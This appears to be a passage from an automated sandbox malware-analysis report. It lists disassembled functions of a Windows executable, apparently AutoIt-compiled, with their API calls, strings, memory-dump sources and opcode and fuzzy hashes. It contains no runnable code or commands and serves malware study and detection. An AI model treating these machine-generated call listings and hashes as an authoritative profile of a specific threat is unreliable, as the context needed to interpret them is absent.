                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00FD35A1,SwapMouseButtons,00000004,?,?,?,?,00FD2754), ref: 00FD35F5
                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,00FD35A1,SwapMouseButtons,00000004,?,?,?,?,00FD2754), ref: 00FD3617
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValue
                                                                    • String ID: Control Panel\Mouse
                                                                    • API String ID: 3677997916-824357125
                                                                    • Opcode ID: e204a8822caac2cba36687617491987ce2c95d173a23ab34989bb7a94dc0e3a4
                                                                    • Instruction ID: c5671a5a6fd2407c7fa9194cd7592a22db1f0d95654a2c01ca5c7f8475d5316e
                                                                    • Opcode Fuzzy Hash: e204a8822caac2cba36687617491987ce2c95d173a23ab34989bb7a94dc0e3a4
                                                                    • Instruction Fuzzy Hash: C9114876910208FFDB208F64D844EAFB7B9EF04750F04546AF905D7300D271DE40A761
                                                                    APIs
                                                                      • Part of subcall function 00FD4EE5: _fseek.LIBCMT ref: 00FD4EFD
                                                                      • Part of subcall function 01039734: _wcscmp.LIBCMT ref: 01039824
                                                                      • Part of subcall function 01039734: _wcscmp.LIBCMT ref: 01039837
                                                                    • _free.LIBCMT ref: 010396A2
                                                                    • _free.LIBCMT ref: 010396A9
                                                                    • _free.LIBCMT ref: 01039714
                                                                      • Part of subcall function 00FF2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00FF9A24), ref: 00FF2D69
                                                                      • Part of subcall function 00FF2D55: GetLastError.KERNEL32(00000000,?,00FF9A24), ref: 00FF2D7B
                                                                    • _free.LIBCMT ref: 0103971C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                    • String ID:
                                                                    • API String ID: 1552873950-0
                                                                    • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                    • Instruction ID: 4afedd58cf00ce7913c65af5796af4e147a2fb07d4db1add72a70585c1c3aa44
                                                                    • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                    • Instruction Fuzzy Hash: A1515EB1D04218ABDF259F64CC81AAEBBB9FF88304F04449EF649A3351DB755A80DF58
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                    • String ID:
                                                                    • API String ID: 2782032738-0
                                                                    • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                    • Instruction ID: 84a10a5e1515a7a4a11fd636d2239fc07ef6499fbe990527bb19e031e6685ad0
                                                                    • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                    • Instruction Fuzzy Hash: 1941B576E0074E9BDB189E69C8809BF7BA5AF423B0B24813DEA15C7670D774ED41EB40
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0100EA39
                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 0100EA83
                                                                      • Part of subcall function 00FD4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FD4743,?,?,00FD37AE,?), ref: 00FD4770
                                                                      • Part of subcall function 00FF0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FF07B0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Name$Path$FileFullLongOpen_memset
                                                                    • String ID: X
                                                                    • API String ID: 3777226403-3081909835
                                                                    • Opcode ID: e54368b19268b78ff23ff5a072890282e63380d13d9fb24b646c4c69a9157f67
                                                                    • Instruction ID: 689066bcfb18092f9f17283d6c478ff1da33bb03ed297b7c20d8e4afa59cc38e
                                                                    • Opcode Fuzzy Hash: e54368b19268b78ff23ff5a072890282e63380d13d9fb24b646c4c69a9157f67
                                                                    • Instruction Fuzzy Hash: 7F21D831A042489BDB52EF94CC45BEE7BF9AF49310F04805BF548BB381DBB855899FA1
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: __fread_nolock_memmove
                                                                    • String ID: EA06
                                                                    • API String ID: 1988441806-3962188686
                                                                    • Opcode ID: 1b5539ece4b80f37105524d272c6181daa3fd00629bd1254ff2193e0ddea3ef4
                                                                    • Instruction ID: 28c219dacfa6668c8a282566e904a5e9b12f5bf21998ddc0dd9a3335738ba6c0
                                                                    • Opcode Fuzzy Hash: 1b5539ece4b80f37105524d272c6181daa3fd00629bd1254ff2193e0ddea3ef4
                                                                    • Instruction Fuzzy Hash: 3001F9718042187EDB18DAA8CC5AEFE7BFCDF11701F00419FF692D2181E478E6048760
                                                                    APIs
                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 015821BD
                                                                    • ExitProcess.KERNEL32(00000000), ref: 015821DC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2063593989.0000000001581000.00000040.00000020.00020000.00000000.sdmp, Offset: 01581000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_1581000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CreateExit
                                                                    • String ID: D
                                                                    • API String ID: 126409537-2746444292
                                                                    • Opcode ID: 8e3ba9fc2c51f8adf90e9822168422d2e6d76900810f8c5233ba2e98edbc58fa
                                                                    • Instruction ID: f287c42f7bf1e47ccac162125440ac6ff12832e138fca035da8d68c24fc1a8a9
                                                                    • Opcode Fuzzy Hash: 8e3ba9fc2c51f8adf90e9822168422d2e6d76900810f8c5233ba2e98edbc58fa
                                                                    • Instruction Fuzzy Hash: D9F0ECB594024DABDB60EFE0CC49FEE77BCBF44701F508508FB0AAA184DA74D6088B61
                                                                    APIs
                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 010398F8
                                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0103990F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Temp$FileNamePath
                                                                    • String ID: aut
                                                                    • API String ID: 3285503233-3010740371
                                                                    • Opcode ID: 5291de6213422bd7cc2a3526edc12be37785e9b9dbf174d48dc6235ebf2146e2
                                                                    • Instruction ID: 3ed883f082eb4318f2e8d3ad0da3ef950b95a87ddecc0c87d8315006a6f0b1d4
                                                                    • Opcode Fuzzy Hash: 5291de6213422bd7cc2a3526edc12be37785e9b9dbf174d48dc6235ebf2146e2
                                                                    • Instruction Fuzzy Hash: A5D05B7554030DABDB60AA90DC0DF97773CD704700F0042A1BAD495051D97555548B91
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a50416cec7d0993ed3e26a4449b0371402967b0dc2f08114517266a6df77736d
                                                                    • Instruction ID: 1e2327187577d2d8493fd558535acb842e1c41e7bb2694bb2c93463619a768a8
                                                                    • Opcode Fuzzy Hash: a50416cec7d0993ed3e26a4449b0371402967b0dc2f08114517266a6df77736d
                                                                    • Instruction Fuzzy Hash: D1F146B06083419FDB14DF28C980A6ABBE5FF88314F44896EF8999B351D774E945CF82
                                                                    APIs
                                                                      • Part of subcall function 00FF0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FF0193
                                                                      • Part of subcall function 00FF0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00FF019B
                                                                      • Part of subcall function 00FF0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FF01A6
                                                                      • Part of subcall function 00FF0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FF01B1
                                                                      • Part of subcall function 00FF0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00FF01B9
                                                                      • Part of subcall function 00FF0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00FF01C1
                                                                      • Part of subcall function 00FE60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00FDF930), ref: 00FE6154
                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00FDF9CD
                                                                    • OleInitialize.OLE32(00000000), ref: 00FDFA4A
                                                                    • CloseHandle.KERNEL32(00000000), ref: 010145C8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                    • String ID:
                                                                    • API String ID: 1986988660-0
                                                                    • Opcode ID: 995e0edca6da6d27cfebeb7bd8367e3d5fe10e171bd3a801c63be80998465b08
                                                                    • Instruction ID: d041e13584f2149031e17c0b60f9426308e6d28bdf6fde8db861e83e1042a23d
                                                                    • Opcode Fuzzy Hash: 995e0edca6da6d27cfebeb7bd8367e3d5fe10e171bd3a801c63be80998465b08
                                                                    • Instruction Fuzzy Hash: 1381C0B0A052408FC7A6EF3BEC716197BE5FB9830AB50812B90D8CB359EB7E45059F51
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00FD4370
                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FD4415
                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00FD4432
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: IconNotifyShell_$_memset
                                                                    • String ID:
                                                                    • API String ID: 1505330794-0
                                                                    • Opcode ID: 4d6820ed706dca67085618c4886ea8f1106e40a8bd932e9c4f9f21a28d4246d5
                                                                    • Instruction ID: 1bd867febc869b111468fc70d18209ca70299c8768170916b8c953fa9a050a7f
                                                                    • Opcode Fuzzy Hash: 4d6820ed706dca67085618c4886ea8f1106e40a8bd932e9c4f9f21a28d4246d5
                                                                    • Instruction Fuzzy Hash: C1318FB09047019FD731DF24D88469BBBE8FB49318F04096FF6DA82381E775A944DB92
                                                                    APIs
                                                                    • __FF_MSGBANNER.LIBCMT ref: 00FF5733
                                                                      • Part of subcall function 00FFA16B: __NMSG_WRITE.LIBCMT ref: 00FFA192
                                                                      • Part of subcall function 00FFA16B: __NMSG_WRITE.LIBCMT ref: 00FFA19C
                                                                    • __NMSG_WRITE.LIBCMT ref: 00FF573A
                                                                      • Part of subcall function 00FFA1C8: GetModuleFileNameW.KERNEL32(00000000,010933BA,00000104,?,00000001,00000000), ref: 00FFA25A
                                                                      • Part of subcall function 00FFA1C8: ___crtMessageBoxW.LIBCMT ref: 00FFA308
                                                                      • Part of subcall function 00FF309F: ___crtCorExitProcess.LIBCMT ref: 00FF30A5
                                                                      • Part of subcall function 00FF309F: ExitProcess.KERNEL32 ref: 00FF30AE
                                                                      • Part of subcall function 00FF8B28: __getptd_noexit.LIBCMT ref: 00FF8B28
                                                                    • RtlAllocateHeap.NTDLL(01500000,00000000,00000001,00000000,?,?,?,00FF0DD3,?), ref: 00FF575F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                    • String ID:
                                                                    • API String ID: 1372826849-0
                                                                    • Opcode ID: 62d60e9f73b6ee96ca8c3faa39d4145a9abd170171c19e9ef111a43720b01a7e
                                                                    • Instruction ID: 2f4c88bd63d68d2651d95ae1bc5e6e88ef3d7648877da3fdf51fcec915b9f9d2
                                                                    • Opcode Fuzzy Hash: 62d60e9f73b6ee96ca8c3faa39d4145a9abd170171c19e9ef111a43720b01a7e
                                                                    • Instruction Fuzzy Hash: 1301D237700B0EDAD6213B34EC52B7E7748AF82B72F210025F7059A1A1DEB898017B60
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,01039548,?,?,?,?,?,00000004), ref: 010398BB
                                                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,01039548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 010398D1
                                                                    • CloseHandle.KERNEL32(00000000,?,01039548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 010398D8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleTime
                                                                    • String ID:
                                                                    • API String ID: 3397143404-0
                                                                    • Opcode ID: 8f9aab16a74a63a887a4736f54e04e2caae8085c635a6333e754403f4c62180b
                                                                    • Instruction ID: 2b3bba269b4c4f23d6c26ff0802e42ef6b86f9823e9629957797859569f12c2f
                                                                    • Opcode Fuzzy Hash: 8f9aab16a74a63a887a4736f54e04e2caae8085c635a6333e754403f4c62180b
                                                                    • Instruction Fuzzy Hash: FAE08632141315B7E7312B54EC09FCB7F59AB46764F108110FB94A90D087BA15119798
                                                                    APIs
                                                                    • _free.LIBCMT ref: 01038D1B
                                                                      • Part of subcall function 00FF2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00FF9A24), ref: 00FF2D69
                                                                      • Part of subcall function 00FF2D55: GetLastError.KERNEL32(00000000,?,00FF9A24), ref: 00FF2D7B
                                                                    • _free.LIBCMT ref: 01038D2C
                                                                    • _free.LIBCMT ref: 01038D3E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                    • Instruction ID: 42c748a43608b1a2133fcc58bab025b9d7f753d5fcfcf76420a9e7cea1a108b4
                                                                    • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                    • Instruction Fuzzy Hash: 3BE0C2A160160842DBA0B57CAC45AA723DC4F887527044A8EBA4DD7152CE68F4429024
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: CALL
                                                                    • API String ID: 0-4196123274
                                                                    • Opcode ID: 110339f54d881655c71ee5f47725ffb5db5228758625149da94bd23a60260fe5
                                                                    • Instruction ID: ef639e47282c6f7975a7d88f41792b7835187fffbec0166894c4075d77037ab1
                                                                    • Opcode Fuzzy Hash: 110339f54d881655c71ee5f47725ffb5db5228758625149da94bd23a60260fe5
                                                                    • Instruction Fuzzy Hash: EC227C71908301DFDB25DF14C490B2AB7E2BF84310F19895EE89A8B361DB35EC45EB86
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID: EA06
                                                                    • API String ID: 4104443479-3962188686
                                                                    • Opcode ID: 3183e9951e68587ef83a5b511530da70b1bebd50f846702a00c6b9f44605de81
                                                                    • Instruction ID: 8b88cec139b8e9d51f8f0863a584dc564f57e0c1b76f77df8cde591c28e37a9e
                                                                    • Opcode Fuzzy Hash: 3183e9951e68587ef83a5b511530da70b1bebd50f846702a00c6b9f44605de81
                                                                    • Instruction Fuzzy Hash: 63415B22E041586BDF229B948C917BE7FA39B45310F2C4477ED86DB382D634BD44B7A1
                                                                    APIs
                                                                    • IsThemeActive.UXTHEME ref: 00FD4834
                                                                      • Part of subcall function 00FF336C: __lock.LIBCMT ref: 00FF3372
                                                                      • Part of subcall function 00FF336C: DecodePointer.KERNEL32(00000001,?,00FD4849,01027C74), ref: 00FF337E
                                                                      • Part of subcall function 00FF336C: EncodePointer.KERNEL32(?,?,00FD4849,01027C74), ref: 00FF3389
                                                                      • Part of subcall function 00FD48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00FD4915
                                                                      • Part of subcall function 00FD48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00FD492A
                                                                      • Part of subcall function 00FD3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FD3B68
                                                                      • Part of subcall function 00FD3B3A: IsDebuggerPresent.KERNEL32 ref: 00FD3B7A
                                                                      • Part of subcall function 00FD3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,010952F8,010952E0,?,?), ref: 00FD3BEB
                                                                      • Part of subcall function 00FD3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00FD3C6F
                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00FD4874
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                    • String ID:
                                                                    • API String ID: 1438897964-0
                                                                    • Opcode ID: 10777bfcaf87287fd6ece23b87f16f174da25cea061c54a091829269b4c189b9
                                                                    • Instruction ID: 180063fde083afb6c0a144a69151c560e11d3b17b607c46a483cbec8ff4c8dad
                                                                    • Opcode Fuzzy Hash: 10777bfcaf87287fd6ece23b87f16f174da25cea061c54a091829269b4c189b9
                                                                    • Instruction Fuzzy Hash: 6F119D719083459BC710EF69DC1590EBFE9FF89750F10451FF080972A1DBBAA544DB92
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00FD5821,?,?,?,?), ref: 00FD5CC7
                                                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00FD5821,?,?,?,?), ref: 0100DD73
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
